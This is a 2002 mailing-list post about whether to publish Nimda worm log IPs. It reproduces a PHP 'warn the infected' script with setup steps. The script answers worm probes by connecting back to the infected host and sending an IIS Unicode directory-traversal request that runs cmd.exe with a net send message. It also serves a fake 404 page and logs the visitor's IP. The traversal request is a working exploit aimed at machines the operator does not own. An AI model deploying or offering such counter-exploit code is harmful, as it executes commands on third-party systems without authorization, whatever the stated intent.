Re: Publishing Nimda Logs

From: Jonathan Bloomquist (bocasolutionsat_private)
Date: Tue May 07 2002 - 12:36:09 PDT

    --- "Deus, Attonbitus" <Thorat_private> wrote:

    -- snip --

    >   1) Recommended. Go for it and publish the IP's and
    > let the "Gods of IP"
    >   sort out the damage.
    >   2) A Bad Thing. These are innocent victims, and
    > you will just have them be
    >   attacked by evil people.
    >   3) Boring. Who cares? It's Nimda, and an everyday
    > part of life. Deal with
    >   it and ignore the logs.
    >
    >   If "1," then I was thinking of going with a "Hall
    > of Shame" and providing
    >   ARIN look ups, contacts, and the whole bit. I
    > could even allow other
    >   people to post logs there and stuff like that...
    >
    >   Input appreciated.

    How about another option (4. warn the infected) as
    proposed in this slashdot post (text follows):

    http://slashdot.org/comments.pl?sid=21830&cid=2329699

    I made a PHP script, by modifying a similar one used
    for Code Red. First make a "scripts" directory in your
    web server's root directory. Now put this into a file
    called "root.exe"

    <?php
    /* Open a connection to the offender */
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
                                    /* Check to see if the
    connection actually opened */
                                    if ($fp)
                                    {

             /* URL-encode the message... */

             $string = urlencode("net send %COMPUTERNAME%
    WARNING: The NIMDA worm has been detected on your
    computer. Please shut down the IIS web server that is
    currently running and keep it disabled until you can
    patch and/or re-install your system, or better yet,
    upgrade to Linux or FreeBSD. Visit
    http://www.kb.cert.org/vuls/id/111677 for more
    information.");

             /* ...and send it */

             fputs ($fp, "GET
    /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst
    em32/cmd.exe?/c+$string HTTP/1.0\n\n");

             /* close the connection (though it probably
    got closed automatically) */

             fclose ($fp);
                                    }

    /* for fun and confusion.. */
                                    header ("HTTP/1.0
    404");

                                echo ("<!DOCTYPE HTML
    PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
                                    echo
                                    echo ("<h1>Not
    Found</h1>\n");
                                    echo ("The requested
    URL $SCRIPT_NAME was not found on this server.\n");
                                    echo
    ("</body></html>\n");
                                    echo
    ("<address>Apache/1.3.20 Server at $SERVER_NAME Port
    $SERVER_PORT</address>\n");
                                    echo
    ("</body></html>\n");

    $res = "dirty\r\n";
    $log = fopen("/tmp/nimda.log", "a");
    fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s
    T") . " - " . $res);
    fclose($log);
    ?>

    Then, (after making sure users can access the file..
    try going to http://machine/scripts/root.exe. It's
    going to print out the contents of that file. You want
    to change that, right?

    Well here's how you change that. Edit your httpd.conf
    file (/etc/httpd.conf, /usr/local/apache/httpd.conf,
    whatever it is) and put this type in like this:

    AddType application/x-httpd-php .php .php3 .exe

    Now restart Apache by issuing one of either:
    /etc/rc.d/init.d/httpd restart
    apachectl restart

    That should do it, and you're going to have a logfile
    of all the people who have been warned in
    /tmp/nimba.log.